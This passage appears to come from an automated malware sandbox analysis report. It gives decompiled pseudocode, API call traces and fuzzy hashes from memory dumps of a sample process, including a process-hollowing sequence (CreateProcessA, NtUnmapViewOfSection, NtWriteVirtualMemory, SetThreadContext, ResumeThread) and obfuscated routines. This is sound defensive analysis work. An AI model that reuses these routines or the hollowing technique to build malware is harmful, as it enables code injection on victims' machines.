				_t27 = _t11;
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t19, _t20, _t21, _t27); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t24;
				return E004012BF(_t13, _t19, _t20, _t21, _t27);
			}

0x0040197f
0x0040199f
0x0040198f
0x00401994
0x00401997
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.319595108.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction ID: 57e3c6fabe06a165ad46eb134568508f3e71a46e85a60e7e826126cb482f7349
Opcode Fuzzy Hash: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction Fuzzy Hash: 1601D8B1708204F7DB00AB959E92D7A3329AF41710F204137BA43791E1D63D9D22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019B1, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004019B1(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("in al, dx");
				if (__eflags != 0) goto 0x40199f;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

0x004019b1
0x004019b1
0x004019b1
0x004019b1
0x004019b2
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.319595108.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction ID: 7f18fd79f6fc81d1aacc7b9178c151b85e6c9e578e0c4c1d9390a1e0af9d8492
Opcode Fuzzy Hash: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction Fuzzy Hash: A101D671204200EBDB019FA9DD95DA93726EF41310F10027BB503BA1E2D63D9A16EB27

Uniqueness

Uniqueness Score: -1.00%

Function 0040198A, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040198A(void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t32 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("std");
				asm("lds ebp, [ebp+0x19bb684d]");
				_push(0x19bb);
				_t8 =  *_t27;
				_t28 = _t27 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t29 = _t28 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t32); // executed
				_t33 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t33); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t29;
				return E004012BF(_t13, _t20, _t21, _t23, _t33);
			}

0x0040198a
0x0040198a
0x0040198a
0x0040198a
0x0040198c
0x0040198f
0x00401994
0x00401997
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.319595108.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction ID: a72ed57d07a02d256bd32122d7544ea4cc166053f19893fffcfb0d55415ced24
Opcode Fuzzy Hash: ccfb191151a767bdc9cbe4523c07d0d7ed4776b2de0f136642fab053b244c2bf
Instruction Fuzzy Hash: 0701A771608204EBDB01AF94DD92D6E3365AF41314F204177B943791E1C63D9E22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040199C, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040199C(void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t33;

				_t24 = __esi;
				_t22 = __edi;
				_t21 = __edx;
				_t33 = __edx - __ecx;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t28;
				_t29 = _t28 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t30 = _t29 + 4;
				E004012BF(_t8, __edx, __edi, __esi, _t33);
				_t16 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_push(_t26 - 4);
				_push( *((intOrPtr*)(_t26 + 0x10)));
				_push( *((intOrPtr*)(_t26 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t21, _t22, __esi, _t33); // executed
				_t34 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t26 + 0x14)));
					_push( *((intOrPtr*)(_t26 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t21, _t22, _t24, _t34); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t30;
				return E004012BF(_t13, _t21, _t22, _t24, _t34);
			}

0x0040199c
0x0040199c
0x0040199c
0x0040199c
0x0040199f
0x0040198f
0x00401994
0x00401997
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.319595108.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction ID: 38790f97698b8fbd236dc93497c28a5a48dbceb78932be0dbcbbb6d4f4f3ee68
Opcode Fuzzy Hash: 4fb5e9a5afbf0bb0d8b1c466ddce95a75c30193c24937f166a7f97c6bea3c0da
Instruction Fuzzy Hash: F1014471708204E7DB019A959D92E6A3365AB41710F204177BA43791E1C63E9A22EB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004019A0, Relevance: 3.0, APIs: 2, Instructions: 43
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004019A0(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("sbb ebx, ebp");
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

0x004019a0
0x004019a0
0x004019a0
0x004019a0
0x004019b4
0x004019a7
0x004019ac
0x004019b6
0x004019bb
0x004019c3
0x004019c9
0x004019ca
0x004019cd
0x004019d0
0x004019d1
0x004019d6
0x004019d8
0x004019da
0x004019dd
0x004019e0
0x004019e1
0x004019e2
0x004019e2
0x004019eb
0x004019f3
0x004019f8
0x00401a21

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000003.00000002.319595108.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction ID: 9c9c3dab28d51d6fb39e7a0de955185f52c78c5ab62663713faf9a931d33ce0c
Opcode Fuzzy Hash: a3f083826976df0a3047c0ccb3ceba760f639657c05e2c9146095c379659a445
Instruction Fuzzy Hash: 8EF08171308204E7DB01AF959D96EAE3725AF41310F20427BBA43791E1C63D8922EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402648, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 23%

			E00402648(signed char __edx, void* __eflags) {
				void* _v3;
				void* __edi;
				void* __esi;
				void* _t19;
				signed char _t20;
				signed int _t25;
				signed char _t27;
				void* _t32;
				signed char _t33;
				signed char _t37;
				void* _t38;
				signed int* _t40;
				signed char _t43;
				signed char _t45;
				void* _t46;
				signed int _t48;
				signed int _t53;
				void* _t55;
				void* _t63;
				signed int _t65;
				signed int* _t69;
				void* _t70;
				signed int** _t85;
				void* _t99;
				signed int _t107;

				_t99 = __eflags;
				_t43 = __edx;
				do {
					_t19 = 0x2687;
					_push(0x1a2);
					_t40 =  *_t85;
					_t85 =  &(_t85[1]);
					_t20 = E004012BF(_t19, _t43, _t63, _t69, _t99);
					asm("int1");
				} while (_t99 >= 0);
				asm("aaa");
				asm("fidiv word [ss:esi]");
				_t33 = _t32 + 1;
				 *(_t43 + 0x32) =  *(_t43 + 0x32) ^ _t20;
				asm("fnsave [ecx+ebp*2]");
				asm("aam 0x33");
				asm("fnsave [ebx]");
				asm("xlatb");
				asm("out dx, eax");
				asm("aaa");
				asm("hlt");
				asm("fnsave [ebx]");
				_t45 = _t43 & _t33 ^  *_t40;
				asm("xlatb");
				asm("out dx, eax");
				_pop(es);
				asm("sbb ebx, [edx+0x1f3e33dd]");
				asm("xlatb");
				asm("out dx, eax");
				asm("aaa");
				asm("hlt");
				asm("fnsave [edi]");
				asm("cmpsd");
				asm("aam 0xf5");
				asm("fnsave [ebx]");
				asm("invalid");
				asm("insb");
				asm("fiadd word [ebx-0x23]");
				asm("out dx, eax");
				asm("aaa");
				asm("loop 0xffffffbf");
				_t65 =  *_t69 * 0xffffffde;
				if(_t65 > 0) {
					asm("adc esi, [ss:esi]");
					_t38 = _t33;
					asm("adc esi, [ss:esi]");
					_push(0x36);
					_t65 = _t65;
					_push(_t38);
					_push(_t45 + 4);
				}
				_pop(_t46);
				asm("sbb [ss:esi], dh");
				_t48 = _t46;
				asm("ss outsb");
				asm("retf");
				_pop(_t70);
				asm("popad");
				asm("o16 leave");
				asm("adc al, [gs:edi]");
				_t25 = _t48 *  *(_t70 + 0x5e) ^ 0x365e6666;
				_pop(0xf2b51232);
				asm("sbb dh, [gs:ebp+0xb42c9ce]");
				while(1) {
					L13:
					asm("lock pop es");
					_t53 = _t25 *  *(_t70 + 0x66) >> 0x20;
					_pop(_t70);
					_t27 = _t25 *  *(_t70 + 0x66) ^ 0x00000036;
					while(1) {
						L14:
						asm("aaa");
						asm("pusha");
						_pop(0xf2b51232);
						_push(es);
						_push(ds);
						_t25 = _t27 ^  *(_t27 - 0x37);
						_t55 = _t53 + 1 +  *[gs:ebx-0x42debd0a];
						if(_t55 != 0) {
							break;
						}
						asm("o16 fiadd word [di+0x3637]");
						_t37 = 0xf6;
						_t53 = _t55 + 1;
						_t107 = _t53;
						asm("aas");
						asm("int1");
						if (_t107 >= 0) goto L13;
						while(1) {
							asm("retf 0x3637");
							asm("aaa");
							asm("fnsave [ss:ecx]");
							asm("int1");
							if(_t107 >= 0) {
								goto L14;
							} else {
								asm("frstor [ss:edx+esi]");
								asm("movsb");
								asm("into");
								_pop(_t70);
								_t37 = _t37 ^ 0x00000010;
								_t53 = _t53 ^ _t25;
								if(_t53 < 0) {
									continue;
								} else {
									asm("fldcw word [ecx+0x6bb623dd]");
									_t25 = _t25 ^ 0x37945ea8;
								}
							}
							goto L20;
						}
						goto L13;
					}
					L20:
					asm("aaa");
					asm("cld");
					return  *0x8bc9c9dc;
				}
			}

0x00402648
0x00402648
0x00402654
0x00402660
0x00402670
0x00402675
0x00402678
0x00402682
0x00402687
0x00402687
0x0040268a
0x0040268b
0x00402690
0x00402694
0x004026fa
0x004026ff
0x00402701
0x00402705
0x00402707
0x00402708
0x00402709
0x0040270a
0x0040270c
0x0040270e
0x00402710
0x00402711
0x00402716
0x0040271c
0x0040271e
0x0040271f
0x00402720
0x00402721
0x00402723
0x00402724
0x00402726
0x0040272e
0x00402730
0x00402731
0x00402739
0x0040273a
0x0040273b
0x0040273d
0x00402740
0x00402742
0x0040274f
0x00402759
0x0040275c
0x0040275f
0x00402765
0x00402773
0x00402777
0x00402778
0x00402779
0x0040277f
0x00402781
0x00402788
0x0040278b
0x0040278e
0x00402791
0x00402793
0x0040279e
0x004027a7
0x004027a8
0x004027b0
0x004027b0
0x004027b0
0x004027b2
0x004027b5
0x004027b7
0x004027b9
0x004027b9
0x004027b9
0x004027bb
0x004027bd
0x004027be
0x004027c3
0x004027cc
0x004027cf
0x004027d6
0x00000000
0x00000000
0x004027d8
0x004027de
0x004027e1
0x004027e1
0x004027e2
0x004027e3
0x004027e4
0x004027e5
0x004027e5
0x004027e6
0x004027e7
0x004027ec
0x004027ed
0x00000000
0x004027ef
0x004027ef
0x004027f6
0x004027f7
0x004027f8
0x00402802
0x00402804
0x00402806
0x00000000
0x00402808
0x00402808
0x00402810
0x00402810
0x00402806
0x00000000
0x004027ed
0x00000000
0x004027e5
0x00402812
0x00402814
0x0040282b
0x00402830
0x00402830

Memory Dump Source

Source File: 00000003.00000002.319595108.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35aecf4ce77791f2e4fca3ff3c7f0a8d80036c6cd48bc3d8a29629f9e7474573
Instruction ID: 645a99f6af525781c859d0a3b6ad4b974778ef7f848d4b8c34c181efa6051e33
Opcode Fuzzy Hash: 35aecf4ce77791f2e4fca3ff3c7f0a8d80036c6cd48bc3d8a29629f9e7474573
Instruction Fuzzy Hash: 024100372081801FD6119A7452479E27B92EBC7378B704B7BCCC3AE1C3D9578847929A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tvvihsf PID: 6844 Parent PID: 1104 tvvihsfCOMMON

Executed Functions

Function 02E30110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02E30156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 02E3016C
CreateProcessA.KERNELBASE(?,00000000), ref: 02E30255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02E30270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02E30283
GetThreadContext.KERNELBASE(00000000,?), ref: 02E3029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02E302C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02E302E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02E30304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 02E3032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02E30399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02E303BF
SetThreadContext.KERNELBASE(00000000,?), ref: 02E303E1
ResumeThread.KERNELBASE(00000000), ref: 02E303ED
ExitProcess.KERNEL32(00000000), ref: 02E30412

Memory Dump Source

Source File: 00000015.00000002.370435615.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 34d68636bde74e3f235552ac508638c1385d653fe65d5fe5d9cc070ebe10850a
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 97B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02E30420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02E30533

Strings

mfoaskdfnoa, xrefs: 02E30520, 02E30523
d, xrefs: 02E30584
saodkfnosa9uin, xrefs: 02E304DA
0, xrefs: 02E30492

Memory Dump Source

Source File: 00000015.00000002.370435615.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 3410cfee66917f8aea373d68c7fedfaf3a5ca9f86e8f4cdd295c987da81a7a48
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 7E511A70D483C8EAEB12CBD8C849BDDBFB26F11709F144058D5447F286C3BA5658CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02E305B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 02E305EC

Strings

apfHQ, xrefs: 02E305E2, 02E305E5
o, xrefs: 02E30600

Memory Dump Source

Source File: 00000015.00000002.370435615.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: c24eac8691609c73371cfd9c4b67b61e40444f341b0204e04074b12d993be5ef
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: BB012170C0425CEEDF15DB98C5183AEBFB5AF41309F1480D9C4092B241D7769B58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02FE869E, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 02FE86E6

Memory Dump Source

Source File: 00000015.00000002.370498543.0000000002FE7000.00000040.00000001.sdmp, Offset: 02FE7000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: c436ebcd1a84ea3129c069035861b2489ae0a4532c2016ad8f835ee533c20a4a
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 7BF0C2326007106FDB213BF4988CB6A72E8AF492A8F100538E743910D0DB70EC054E61

Uniqueness

Uniqueness Score: -1.00%

Function 02FE835D, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02FE83AE

Memory Dump Source

Source File: 00000015.00000002.370498543.0000000002FE7000.00000040.00000001.sdmp, Offset: 02FE7000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 99e81e37b9fb5c5c822f33a2a3ed4bddd2d65973ed14680aff8f86bd4b9b3f3e
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 90113C79A00208EFDB01DF98C985E98BBF5AF08391F058094FA499B361D371EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: tvvihsf PID: 6892 Parent PID: 6844 tvvihsfCOMMON

Executed Functions

Function 0040197F, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E0040197F(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;

				_t26 = __eflags;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t22;
				_t23 = _t22 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t24 = _t23 + 4;
				E004012BF(_t8, _t19, _t20, _t21, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t19, _t20, _t21, _t26); // executed
				_t27 = _t11;
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t19, _t20, _t21, _t27); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t24;
				return E004012BF(_t13, _t19, _t20, _t21, _t27);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000016.00000002.382004753.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction ID: 57e3c6fabe06a165ad46eb134568508f3e71a46e85a60e7e826126cb482f7349
Opcode Fuzzy Hash: bcb473a80559007bb28423a92ef8681f65ebbcb398205737adca3c99fe595efc
Instruction Fuzzy Hash: 1601D8B1708204F7DB00AB959E92D7A3329AF41710F204137BA43791E1D63D9D22EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019B1, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004019B1(void* __edi, void* __esi, void* __eflags) {
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				void* _t27;
				intOrPtr* _t28;

				_t31 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("in al, dx");
				if (__eflags != 0) goto 0x40199f;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t28 = _t27 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t31); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t32); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t28;
				return E004012BF(_t13, _t20, _t21, _t23, _t32);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019EB

Memory Dump Source

Source File: 00000016.00000002.382004753.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction ID: 7f18fd79f6fc81d1aacc7b9178c151b85e6c9e578e0c4c1d9390a1e0af9d8492
Opcode Fuzzy Hash: cbd6cf45c0b53524ac5aa4dd2f83136c209037899838eeeb919ebb42b7f8e0e9
Instruction Fuzzy Hash: A101D671204200EBDB019FA9DD95DA93726EF41310F10027BB503BA1E2D63D9A16EB27

Uniqueness

Uniqueness Score: -1.00%

Function 0040198A, Relevance: 3.0, APIs: 2, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040198A(void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t20;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t32 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				asm("std");
				asm("lds ebp, [ebp+0x19bb684d]");
				_push(0x19bb);
				_t8 =  *_t27;
				_t28 = _t27 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t29 = _t28 + 4;
				E004012BF(_t8, _t20, __edi, __esi, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_push(_t25 - 4);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t20, _t21, __esi, _t32); // executed
				_t33 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					L004015D3(_t16, _t20, _t21, _t23, _t33); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_push(0x19bb);
				_t13 =  *_t29;
				return E004012BF(_t13, _t20, _t21, _t23, _t33);
			}

APIs

Sleep.KERNELBASE(00001388,00000062), ref: 004019C3
